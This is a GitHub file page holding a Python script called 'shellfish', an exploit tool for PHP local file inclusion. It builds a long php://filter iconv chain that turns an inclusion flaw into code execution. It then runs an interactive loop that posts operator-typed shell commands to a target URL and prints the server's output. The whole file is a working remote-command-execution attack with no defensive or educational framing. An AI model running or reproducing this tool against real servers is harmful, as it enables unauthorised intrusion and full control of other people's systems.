-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathshellfish
More file actions
89 lines (86 loc) · 6.03 KB
/
Copy pathshellfish
File metadata and controls
89 lines (86 loc) · 6.03 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
#!/usr/bin/python3
import requests, argparse, base64, re
from prompt_toolkit import PromptSession
from prompt_toolkit.formatted_text import ANSI
session = PromptSession()
def clean_output(text, remove_top=0, remove_bottom=0):
cleaned = re.sub(r"<style.*?>.*?</style>", "", text, flags=re.DOTALL|re.IGNORECASE)
cleaned = re.sub(r"<head.*?>.*?</head>", "", cleaned, flags=re.DOTALL|re.IGNORECASE)
cleaned = re.sub(r"<[^>]+>", "", cleaned)
cleaned = re.sub(r"[^\x20-\x7E\n]+", "", cleaned)
lines = cleaned.strip().splitlines()
if remove_bottom == 0:
lines = lines[remove_top:]
else:
lines = lines[remove_top:-remove_bottom]
return "\n".join([line.strip() for line in lines if line.strip()])
def getshell(url):
while True:
try:
cmd = session.prompt(ANSI("\033[33m[shellfish]➔ \033[0m"))
#cmd = input("[shellfish]-> ").strip()
if not cmd:
continue
payload = (
"php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|"
"convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157|"
"convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|"
"convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|"
"convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|"
"convert.iconv.UTF8.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|"
"convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|"
"convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|"
"convert.iconv.PT154.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|"
"convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|"
"convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|"
"convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|"
"convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|"
"convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|"
"convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|"
"convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|"
"convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|"
"convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|"
"convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|"
"convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|"
"convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|"
"convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|"
"convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|"
"convert.iconv.CSA_T500.L4|convert.iconv.ISO_8859-2.ISO-IR-103|convert.base64-decode|"
"convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|"
"convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|"
"convert.iconv.UTF8.UTF7|convert.iconv.IBM860.UTF16|convert.iconv.ISO-IR-143.ISO2022CNEXT|"
"convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|"
"convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|"
"convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|"
"convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|"
"convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|"
"convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|"
"convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|"
"convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|"
"convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|"
"convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|"
"convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|"
"convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|"
"convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|"
"convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|"
"convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|"
"convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|"
"convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|"
"convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp"
)
full_url = f"{url}{payload}"
data = {"0": cmd}
r = requests.post(full_url, data=data, timeout=10)
clean_out = clean_output(r.text, remove_top=args.trim_top, remove_bottom=args.trim_bottom)
print(f"{clean_out}")
except KeyboardInterrupt:
break
except Exception as e:
print(f"Error: {e}")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", required=True, help="Target URL")
parser.add_argument("--trim-top", help="Removes lines from top.", type=int, default=0)
parser.add_argument("--trim-bottom", help="Removes lines from bottom.", type=int, default=0)
args = parser.parse_args()
getshell(args.url)